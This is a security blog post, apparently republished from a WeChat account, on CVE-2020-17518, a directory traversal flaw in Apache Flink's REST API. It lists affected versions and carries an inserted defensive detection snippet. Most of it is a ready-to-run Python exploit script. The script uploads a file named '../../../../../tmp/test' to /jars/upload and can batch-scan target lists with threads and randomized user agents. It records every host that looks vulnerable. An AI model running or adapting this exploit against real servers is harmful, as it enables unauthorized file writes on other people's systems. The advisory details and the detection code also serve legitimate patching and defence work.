Apache Flink directory traversal vulnerability: remote files can be read/written through the REST API
CVE ID:
CVE-2020-17518
Description:
CVE-2020-17518: writing remote files through the REST API
Affected versions:
Flink 1.5.1-1.11.2
Fixed versions:
Flink 1.11.3 or Flink 1.12.0
Flink 1.5.1 introduced a REST API through which a maliciously crafted HTTP header lets an uploaded file be written to an arbitrary location on the local file system.
Usage:
Single target: python CVE-2020-17518.py -u http://IP:port
Batch: python CVE-2020-17518.py -f url.txt
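As an added defensive example (not part of the original post or of the PoC script below), the following code checks whether a Flink version falls inside the affected range stated above and flags multipart uploads to the jar-upload endpoint whose filename would escape the upload directory; the record format and the sample records are constructed for illustration and are not Flink's own log format.

```python
import posixpath
import re
from urllib.parse import unquote

# Affected range as stated in the advisory text above: Flink 1.5.1 through 1.11.2
AFFECTED_MIN, AFFECTED_MAX = (1, 5, 1), (1, 11, 2)

def parse_version(version):
    """Turn '1.11.2' (or '1.11.2-SNAPSHOT') into a comparable tuple."""
    return tuple(int(p) for p in re.findall(r"\d+", version)[:3])

def is_affected(version):
    """True if this Flink version falls inside the vulnerable range."""
    return AFFECTED_MIN <= parse_version(version) <= AFFECTED_MAX

def filename_escapes_upload_dir(filename):
    """True if a (possibly URL-encoded) multipart filename resolves outside its directory."""
    name = unquote(unquote(filename)).replace("\\", "/")  # undo double encoding, treat \ as /
    if name.startswith("/"):
        return True  # absolute path: never a legitimate jar name
    norm = posixpath.normpath(name)
    return norm == ".." or norm.startswith("../")

def suspicious_uploads(records):
    """records: constructed dicts {method, path, filename} as a proxy/WAF might log them.
    Returns the filenames of POSTs to the jar-upload endpoint that attempt traversal."""
    hits = []
    for r in records:
        path = unquote(r["path"]).split("?", 1)[0]
        if r["method"] == "POST" and path.startswith("/jars/upload") \
                and filename_escapes_upload_dir(r["filename"]):
            hits.append(r["filename"])
    return hits

# Constructed sample records (hypothetical log format, not Flink's own)
SAMPLE_RECORDS = [
    {"method": "POST", "path": "/jars/upload", "filename": "wordcount.jar"},
    {"method": "POST", "path": "/jars/upload", "filename": "../../../../../tmp/test"},
    {"method": "POST", "path": "/jars/upload", "filename": "..%2F..%2Ftmp%2Fpoc"},
    {"method": "POST", "path": "/jars/upload", "filename": "lib/../wordcount.jar"},
    {"method": "GET", "path": "/jars", "filename": ""},
]

if __name__ == "__main__":
    print("affected 1.11.2:", is_affected("1.11.2"), "| 1.11.3:", is_affected("1.11.3"))
    print("suspicious:", suspicious_uploads(SAMPLE_RECORDS))
```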
# -*- coding: utf-8 -*-
import argparse
import http.client
import random
import requests
import threadpool
import urllib3

banner = """
888888ba dP
88 `8b 88
a88aaaa8P' .d8888b. d8888P .d8888b. dP dP
88 `8b. 88' `88 88 Y8ooooo. 88 88
88 .88 88. .88 88 88 88. .88
88888888P `88888P8 dP `88888P' `88888P'
ooooooooooooooooooooooooooooooooooooooooooooooooooooo
@time:2021/01/06 CVE-2020-17518.py
C0de by NebulabdSec - @batsu
"""
print(banner)

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
# Speak HTTP/1.0 to the target, as the original script does
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'

payload_CMD = '''test'''            # content written into the uploaded file
TARGET_URI = "/jars/upload'%2bsss"  # jar upload endpoint of the Flink REST API


def get_ua():
    """Build a random Chrome-like User-Agent string."""
    first_num = random.randint(55, 62)
    third_num = random.randint(0, 3200)
    fourth_num = random.randint(0, 140)
    os_type = [
        '(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)', '(X11; Linux x86_64)',
        '(Macintosh; Intel Mac OS X 10_12_6)'
    ]
    chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
    ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
                   '(KHTML, like Gecko)', chrome_version, 'Safari/537.36'])
    return ua


def CVE_2020_17518(url):
    """Upload a file whose multipart filename contains a traversal sequence and
    fingerprint the response to decide whether the target looks vulnerable."""
    # The original routes traffic through a local intercepting proxy (e.g. 127.0.0.1:8080);
    # set proxies = None to send requests directly.
    proxies = {"http": "http://127.0.0.1:8080"}
    # proxies = {"socks5": "http://127.0.0.1:1081"}
    paramsMultipart = [('jarfile',
                        ('../../../../../tmp/test', "{}\r\n".format(payload_CMD), 'application/octet-stream'))]
    headers = {
        'User-Agent': get_ua(),
        "Accept": "*/*"
    }
    targetUrl = url + TARGET_URI
    try:
        res = requests.post(targetUrl,
                            files=paramsMultipart,
                            headers=headers,
                            timeout=15,
                            verify=False,
                            proxies=proxies)
        # The author fingerprints the short "Not found" error body by its length
        if len(res.text) == 25 and "Not found" in res.text and "errors" in res.text:
            print("[+] URL:{}--------可能存在CVE-2020-17518漏洞".format(url))
            with open("存在漏洞地址.txt", 'a') as fw:
                fw.write(url + '\n')
        else:
            print("[-] " + url + " 没有发现CVE-2020-17518漏洞.\n")
    except Exception as e:
        print("[-] " + url + " Request ERROR: {}\n".format(e))


def multithreading(filename="ip.txt", pools=5):
    """Run CVE_2020_17518 against every URL listed in `filename`, one per line."""
    works = []
    with open(filename, "r") as f:
        for line in f:
            target = line.rstrip("\n")
            if target:
                works.append(([target], None))
    pool = threadpool.ThreadPool(pools)
    reqs = threadpool.makeRequests(CVE_2020_17518, works)
    for req in reqs:
        pool.putRequest(req)
    pool.wait()


def main():
    print("默认上传文件名为../../../../../tmp/test,内容为'''test'''")
    parser = argparse.ArgumentParser()
    parser.add_argument("-u",
                        "--url",
                        help="Target URL; Example:http://ip:port")
    parser.add_argument("-f",
                        "--file",
                        help="Url File; Example:url.txt")
    args = parser.parse_args()
    url = args.url
    file_path = args.file
    if url is not None and file_path is None:
        CVE_2020_17518(url)
    elif url is None and file_path is not None:
        multithreading(file_path, 10)  # 10 worker threads
    else:
        parser.print_help()


if __name__ == "__main__":
    main()
Project address: https://github.com/QmF0c3UK/CVE-2020-17518
This article was first published on the WeChat public account (Ots安全): Apache Flink directory traversal vulnerability: remote files can be read/written through the REST API
Disclaimer: The programs (methods) discussed in this article may be offensive in nature and are provided solely for security research and teaching. Readers who put this information to any other use bear full legal and joint liability; this site assumes no legal or joint liability. For questions, contact us by e-mail (preferably from a corporate or other valid mailbox so the message is not blocked; contact details are on the home page).